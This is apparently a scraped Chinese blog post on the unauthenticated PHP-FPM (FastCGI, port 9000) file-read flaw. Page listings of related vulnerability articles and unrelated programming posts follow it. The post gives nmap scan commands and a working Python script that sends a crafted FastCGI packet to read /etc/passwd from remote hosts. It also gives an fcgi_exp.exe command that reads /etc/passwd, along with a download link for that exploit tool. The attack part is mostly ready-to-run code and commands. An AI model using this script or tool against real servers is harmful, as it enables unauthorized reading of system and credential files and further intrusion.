看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:

原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/

http://zone.wooyun.org/content/1060

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。

可以用nmap来进行扫描一下:

nmap -sV -p  --open x.x.x.x/

检查出来的是存在9000端口开放的主机

接着用nmap来指纹识别一下:

nmap -sV -p  --open .xxx.xxx./

结果如下:

[root@test:~/work/fcgi]#nmap -sV -p  --open .xxx.xxx./ 

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT

Nmap scan report for abc.net (.xxx.xxx.)

Host is up (.0095s latency).

PORT     STATE SERVICE VERSION

/tcp open  ssh     OpenSSH .3p1 Debian 3ubuntu7 (protocol 2.0)

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel 

Nmap scan report for abc.com (.xxx.xxx.)

Host is up (.0096s latency).

PORT     STATE SERVICE    VERSION

/tcp open  tcpwrapped 

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done:  IP addresses ( hosts up) scanned in 7.70 seconds

如果是对于内网的话可以用lijiejie写的py:

 import socket

 import sys

 def test_fastcgi(ip):

     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)

     sock.connect((ip, 9000))

     data = """

     01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00

     01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53

     54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52

     56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50

     2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52

     4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44

     52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49

     50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f

     70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53

     4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69

     63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00

     """

     data_s = ''

     for _ in data.split():

         data_s += chr(int(_,16))

     sock.send(data_s)

     try:

         ret = sock.recv(1024)

         if ret.find(':root:') > 0:

             print ret

             print '%s is vulnerable!' % ip

             return True

         else:

             return False

     except Exception, e:

         pass

     sock.close()

 if __name__ == '__main__':

     if len(sys.argv) == 1:

         print sys.argv[0], '[ip]'

     else:

         test_fastcgi(sys.argv[1])

然后就可以用:

fcgi_exp.exe read XXX.XXX.XXX.XXX 9000 /etc/passwd

EXP:http://www.lijiejie.com/wp-content/uploads/2015/06/fcgi_exp.zip

FPM的远程利用的更多相关文章

  1. Httpoxy远程代理感染漏洞 [转]

    Httpoxy是一个最新曝出的一个CGI程序漏洞,它主要可能威胁到运行在CGI上的PHP,Go,Python和其他代码程序语言. 0×01  什么是httpoxy? 具体来说, httpoxy是一组影 ...

  2. Nmap备忘单:从探索到漏洞利用(Part 4)

    这是我们的Nmap备忘单的第四部分(Part 1. Part 2. Part 3).本文中我们将讨论更多东西关于扫描防火墙,IDS / IPS 逃逸,Web服务器渗透测试等.在此之前,我们应该了解一下 ...

  3. CVE-2017-8464远程命令执行漏洞(震网漏洞)复现

    前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘.网络共享等途径触发漏洞, ...

  4. Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

    2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘.网络共享等途径触发漏洞,完全控 ...

  5. CVE-2017-3248——WebLogic反序列化漏洞利用工具

    著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,Oracle官方及时发布了最新补丁,修复了该漏 ...

  6. SMBv3远程代码执行漏洞复现(CVE-2020-0796)

    漏洞基本信息 服务器消息块(SMB),是一个网络通信协议,用于提供共享访问到文件,打印机和串行端口的节点之间的网络上.它还提供了经过身份验证的进程间通信机制.SMB的大多数用法涉及运行Microsof ...

  7. 浅谈SSRF

    前言 最近主要是在思考考研的事.还是没想好-- 这几天的话写了一篇简单代审投稿了星盟,看了会SSRF.今天简单写下SSRF. 本文所有思路均来自互联网,并没有新想法.仅仅只是做个记录. 本文可能会有大 ...

  8. MySQL/MariaDB/PerconaDB-提权条件竞争漏洞

    背景 2016年11月01日,国外安全研究员Dawid Golunski在 MySQl, MariaDB 和 PerconaDB 数据库中发现条件竞争漏洞,该漏洞允许本地用户使用低权限(CREATE/ ...

  9. Linux爆新漏洞,长按回车键70秒即可获得root权限

    漏洞来源这个安全问题来源于Cryptsetup存在的一个漏洞(CVE-2016-4484).Cryptsetup是在Linux统一密钥设置(Linux Unified Key Setup, LUKS) ...

随机推荐

  1. Watir资源列表【转】

    Watir简介 "Watir" (发音与 water相近) 全写是 "Web Application Testing in Ruby".Watir是一款用Rub ...

  2. 指针二次释放(_BLOCK_TYPE_IS_VALID)

    [1]_BLOCK_TYPE_IS_VALID是什么错误? (1)最简单的示例代码如下: void main() { ); delete pA; delete pA; } (2)运行后崩溃截图如下: ...

  3. java总结第二次(剩余内容)//类和对象1

    7.成员变量和局部变量 成员变量:在类中定义,用来描述对象将要有什么 局部变量:在类的方法中定义,在方法中保存临时数据 区别:作用域不同 局部变量的作用域仅限于定义它的方法 成员变量的作用域在整个类内 ...

  4. Hadoop3.0新特性介绍,比Spark快10倍的Hadoop3.0新特性

    Hadoop3.0新特性介绍,比Spark快10倍的Hadoop3.0新特性 Apache hadoop 项目组最新消息,hadoop3.x以后将会调整方案架构,将Mapreduce 基于内存+io+ ...

  5. TI CC2541的LED控制

    现在终于进入到蓝牙SPI的环节了, 下面还要研究I2C, 所以第一步, 先点灯, 就是GPIO控制吧. 参考一下LEd的初始化: void HalLedInit (void){#if (HAL_LED ...

  6. GPS模块的AT指令集

    AT+CPIN? 查询sim卡状态. 接着: AT+CGCLASS="B"AT+CGDCONT=1,"IP","CMNET"AT+CGATT ...

  7. React笔记_(5)_react语法4

    ajax 数据应用场景 在真实的开发环境中,拿到了产品需求,第一件事不是逼着后台开发人员先完成,然后前端再介入开发,这样太浪费时间. 正确的做法是跟后端人员先商量好接口名称,请求参数,返回的数据格式等 ...

  8. 【jQuery UI 1.8 The User Interface Library for jQuery】.学习笔记.2.更换主题

    <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...

  9. python怎么装模块

    windows下 最简单的方法: File---Settings--Project  ---Project Interpreter 下----点击 +号,输入你需要安装的模块名,点击Install P ...

  10. JAVA基础知识之JVM-——类加载器

    类加载器负责将.class文件加载到内存,并为其创建java.lang.Class对象,这个对象就代表这个类. 在Java中,通过包名+类名来唯一标识一个类,而在JVM中,要用 类加载器实例+包名+类 ...